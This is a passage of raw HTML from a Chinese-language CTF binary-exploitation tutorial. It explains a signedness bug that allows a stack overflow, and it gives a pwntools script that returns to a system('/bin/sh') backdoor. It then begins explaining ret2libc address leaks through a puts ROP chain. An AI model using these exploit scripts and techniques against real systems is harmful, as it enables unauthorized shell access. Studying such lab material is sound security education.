tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">__int64 <\/span><span style=\"color: #88C0D0\">backdoor<\/span><span style=\"color: #ECEFF4\">()<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">system<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">return<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #81A1C1\">LL;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u6211\u4eec\u9700\u8981\u5148\u8f93\u5165\u4e00\u4e2a<code>int<\/code>\u7c7b\u578b\u7684<code>nbytes&lt;10<\/code>\uff0c\u518d\u8f93\u5165\u5bf9\u5e94\u957f\u5ea6\u7684\u5b57\u7b26\u4e32<code>buf<\/code>\uff08\u82e5\u8d85\u51fa<code>nbytes<\/code>\u7684\u957f\u5ea6\u5c06\u65e0\u6cd5\u8bfb\u5165\uff0c\u82e5<code>nbytes<\/code>\u4e3a\u7b26\u5408\u6761\u4ef6\u7684\u6b63\u6570\uff0c\u6211\u4eec\u5e76\u4e0d\u80fd\u901a\u8fc7<code>buf<\/code>\u6765\u5229\u7528\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff09\uff0c\u4f46\u662f\u95ee\u9898\u5728\u4e8e<code>read(0, buf, (unsigned int)nbytes);<\/code>\u5904\uff0c<code>nbytes<\/code>\u4f1a\u88ab\u8f6c\u6362\u6210<code>usigned int<\/code>\uff0c\u663e\u7136\u6211\u4eec\u53ef\u4ee5\u8f93\u5165-1\u8ba9<code>nbytes<\/code>\u5728\u8f6c\u6362\u7684\u65f6\u5019\u6ea2\u51fa\uff0c\u89e3\u9664<code>read<\/code>\u7684\u957f\u5ea6\u9650\u5236\uff0c\u4ece\u800c\u8fbe\u5230\u901a\u8fc7<code>buf<\/code>\u5b9e\u73b0\u6808\u6ea2\u51fa\u7684\u6548\u679c\u3002<br>\u67e5\u770b\u6c47\u7f16\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>.text:0000000000400726                 public backdoor\n.text:0000000000400726 backdoor        proc near\n.text:0000000000400726 ; __unwind {\n.text:0000000000400726                 push    rbp\n.text:0000000000400727                 mov     rbp, rsp\n.text:000000000040072A                 mov     edi, offset command ; \"\/bin\/sh\"\n.text:000000000040072F                 call    _system\n.text:0000000000400734                 mov     eax, 1\n.text:0000000000400739                 pop     rbp\n.text:000000000040073A                 retn\n.text:000000000040073A ; } \/\/ starts at 400726\n.text:000000000040073A backdoor        endp<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400726<\/span><span style=\"color: #D8DEE9FF\">                 public backdoor<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400726<\/span><span style=\"color: #D8DEE9FF\"> backdoor        proc <\/span><span style=\"color: #81A1C1\">near<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400726<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #616E88\">; __unwind {<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400726<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">push<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #81A1C1\">rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400727<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">rsp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040072A                 <\/span><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">edi<\/span><span style=\"color: #D8DEE9FF\">, offset command <\/span><span style=\"color: #616E88\">; &quot;\/bin\/sh&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040072F                 <\/span><span style=\"color: #81A1C1\">call<\/span><span style=\"color: #D8DEE9FF\">    _system<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400734<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">eax<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400739<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040073A                 <\/span><span style=\"color: #81A1C1\">retn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040073A <\/span><span style=\"color: #616E88\">; } \/\/ starts at 400726<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040073A backdoor        endp<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u770b\u5230<code>backdoor<\/code>\u51fd\u6570\u7684\u8d77\u59cb\u5730\u5740\u4e3a0x400726\uff0c\u53ef\u4ee5\u5199\u51fa\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *\n\nio = remote(\"ip\", port)\nio.recvuntil(b\"name:\")\npayload = b'-1'\nio.sendline(payload)\nio.recvuntil(b\"name?\")\npayload = b'a' * 0x18 + p64(0x400726)\nio.sendline(payload)\nio.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">ip<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> port<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">name:<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">-1<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">name?<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">18<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400726<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">ret2libc<\/h2>\n\n\n\n<p>ret2libc \u5373\u63a7\u5236\u52a8\u6001\u94fe\u63a5\u7f16\u8bd1\u7684\u7a0b\u5e8f\u6267\u884c libc \u4e2d\u7684\u51fd\u6570\uff0c\u901a\u5e38\u662f\u8fd4\u56de\u81f3\u67d0\u4e2a\u51fd\u6570\uff08\u901a\u5e38\u662f<code>puts<\/code>\u51fd\u6570\uff09\u7684 plt \u8868\u5730\u5740\u6216\u8005\u51fd\u6570\u7684\u5177\u4f53\u4f4d\u7f6e (\u5373\u51fd\u6570\u5bf9\u5e94\u7684 got \u8868\u9879\u7684\u5185\u5bb9)\uff0c\u4e00\u822c\u60c5\u51b5\u4e0b\u4f1a\u9009\u62e9\u52ab\u6301\u7a0b\u5e8f\u6267\u884c <code>system(\"\/bin\/sh\")<\/code>\uff0c\u6545\u800c\u6b64\u65f6\u6211\u4eec\u9700\u8981\u77e5\u9053 <code>system<\/code>\u51fd\u6570\u7684\u5730\u5740\u548c<code>\/bin\/sh<\/code>\u7684\u5730\u5740\u3002<br>\u5728Linux\u4e0b\uff0c\u52a8\u6001\u94fe\u63a5\u662f\u901a\u8fc7plt\u548cgot\u6765\u5b9e\u73b0\u7684\uff0c\u8c03\u7528\u52a8\u6001\u94fe\u63a5\u51fd\u6570\u65f6\u4f1a\u5148\u53bbplt\u8868\u548cgot\u8868\u4e2d\u5bfb\u627e\u8be5\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff0cplt\u8868\u4f1a\u6307\u5411got\u8868\u4e2d\u7684\u5730\u5740\uff0cgot\u8868\u6307\u5411libc\u4e2d\u7684\u5730\u5740\uff0c\u6240\u4ee5\u5728\u7a0b\u5e8f\u8fd0\u884c\u65f6\uff1a<strong>got\u8868\u4f1a\u5305\u542b\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff08\u5373libc\u57fa\u5740+\u51fd\u6570\u76f8\u5bf9libc\u7684\u504f\u79fb\uff09<\/strong>\uff0c\u800c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7plt\u8868\u6765\u76f4\u63a5\u8c03\u7528\u51fd\u6570\u3002<\/p>\n\n\n\n<p>\u5229\u7528ret2libc\u52ab\u6301\u7a0b\u5e8f\u4e00\u822c\u6709\u4e00\u4e2a\u6ea2\u51fa\u70b9\uff0c\u8981\u8fdb\u884c\u4e24\u6b21\u52ab\u6301\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u7b2c\u4e00\u6b21\u52ab\u6301\uff1a\u8981\u52ab\u6301\u7a0b\u5e8f\u6cc4\u9732\u51fa\u67d0\u4e2a\u51fd\u6570\u7684\u5730\u5740\uff08\u4f8b\u5982<code>puts<\/code>,<code>write<\/code>\u7b49\uff09\uff0c\u4ece\u800c\u8ba1\u7b97\u51falibc\u7684\u57fa\u5740<\/li>\n\n\n\n<li>\u7b2c\u4e8c\u6b21\u52ab\u6301\uff1a\u63a7\u5236\u7a0b\u5e8f\u901a\u8fc7\u4e0a\u9762\u83b7\u5f97\u7684libc\u57fa\u5740\uff0c\u901a\u8fc7libc\u4e2d<code>system<\/code>\u51fd\u6570\u4ee5\u53ca<code>\/bin\/sh<\/code>\u7684\u504f\u79fb\u6765\u6267\u884c<code>system(\"\/bin\/sh\")<\/code>\u6765\u83b7\u5f97shell<\/li>\n<\/ol>\n\n\n\n<p>\u5728\u7b2c\u4e00\u6b21\u52ab\u6301\u4e2d\uff0c\u6211\u4eec\u4e00\u822c\u8981\u6784\u9020\u51fa\u901a\u8fc7\u8f93\u51fa\u51fd\u6570\uff08\u4f8b\u5982<code>puts<\/code>,<code>write<\/code>,<code>printf<\/code>\uff09\u6765\u8f93\u51fa\u5f85\u6cc4\u9732\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff0c\u4ece\u800c\u8ba1\u7b97\u51falibc\u7684\u57fa\u5740\uff0c\u8ba1\u7b97\u65b9\u6cd5\u4e3a\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>lib\u57fa\u5740=\u51fd\u6570\u771f\u5b9e\u5730\u5740-\u8be5\u51fd\u6570\u76f8\u5bf9libc\u57fa\u5740\u7684\u504f\u79fb\u91cf\uff08\u5373\u8be5\u51fd\u6570\u5728libc\u4e2d\u7684\u5730\u5740\uff09<\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0b\u9762\u4ee564\u4f4d\u7a0b\u5e8f\u4e3a\u57fa\u7840\uff0c\u5bf9\u901a\u8fc7<code>puts<\/code>\u51fd\u6570\u548c<code>write<\/code>\u51fd\u6570\u8fdb\u884c\u51fd\u6570\u771f\u5b9e\u5730\u5740\u6cc4\u9732\u8fdb\u884c\u8bb2\u89e3\uff1a<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><code>puts<\/code>\u51fd\u6570<\/h3>\n\n\n\n<p><code>puts<\/code>\u51fd\u6570\u53ea\u6709\u4e00\u4e2a\u53c2\u6570\uff0c\u8fd9\u4e2a\u53c2\u6570\u6240\u4f7f\u7528\u7684\u5bc4\u5b58\u5668\u4e3a<code>rdi<\/code>\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-18.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"253\" height=\"63\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-151\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4e3a\u4f7f\u7528<code>puts<\/code>\u51fd\u6570\u65f6\uff0c\u6211\u4eec\u53ea\u9700\u8981\u901a\u8fc7<code>pop rdi<\/code>\u5c06\u53c2\u6570\u4ece\u6808\u9876\u5f39\u51fa\u5230<code>rdi<\/code>\u5bc4\u5b58\u5668\u4e2d\u518d\u8c03\u7528<code>puts<\/code>\u51fd\u6570\u8fdb\u884c\u8f93\u51fa\u5373\u53ef\uff0c\u5728ret2libc\u4e2d\uff0c\u6211\u4eec\u4e00\u822c\u4f1a\u5728\u6808\u6ea2\u51fa\u540e\u6784\u9020\u5982\u4e0brop\u94fe\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>pop_rdi\u2192\u76ee\u6807\u51fd\u6570\u7684got\u8868\u5730\u5740\u2192puts\u7684plt\u8868\u5730\u5740\u2192\u8981\u56de\u5230\u7684\u51fd\u6570\u5730\u5740\uff08\u4e00\u822c\u662fmain\u51fd\u6570\uff09<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #d8dee9ff\">pop_rdi\u2192\u76ee\u6807\u51fd\u6570\u7684got\u8868\u5730\u5740\u2192puts\u7684plt\u8868\u5730\u5740\u2192\u8981\u56de\u5230\u7684\u51fd\u6570\u5730\u5740\uff08\u4e00\u822c\u662fmain\u51fd\u6570\uff09<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6ce8\uff1a<code>pop rdi<\/code>\u4e00\u822c\u4f1a\u5b58\u5728\u4e8e<code>__libc_csu_init<\/code>\u4e4b\u4e2d\uff0c\u4e3a<code>pop r15<\/code>\uff08<code>41 5F<\/code>\uff09\u7684\u540e\u534a\u90e8\u5206\uff08<code>5F<\/code>\uff09<\/p>\n<\/blockquote>\n\n\n\n<p>\u8fd9\u6837\u4e4b\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u8bfb\u53d6\u5230\u76ee\u6807\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff0c\u800c\u572864\u4f4d\u7a0b\u5e8f\u4e2d\uff0c\u76ee\u6807\u51fd\u6570\u771f\u5b9e\u5730\u5740\u4e00\u822c\u7531<code>7f<\/code>\u5f00\u5934\u4e14\u53608\u4e2a\u5b57\u8282\uff0c\u800c\u572832\u4f4d\u7a0b\u5e8f\u4e2d\uff0c\u76ee\u6807\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\u4e00\u822c\u4ee5<code>f7<\/code>\u5f00\u5934\u4e14\u53604\u4e2a\u5b57\u8282\uff0c\u90a3\u4e48\u5728\u672c\u9898\u4e2d\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u4e0b\u9762\u8fd9\u6761\u8bed\u53e5\u6765\u8bfb\u51fa\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00')) <\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span 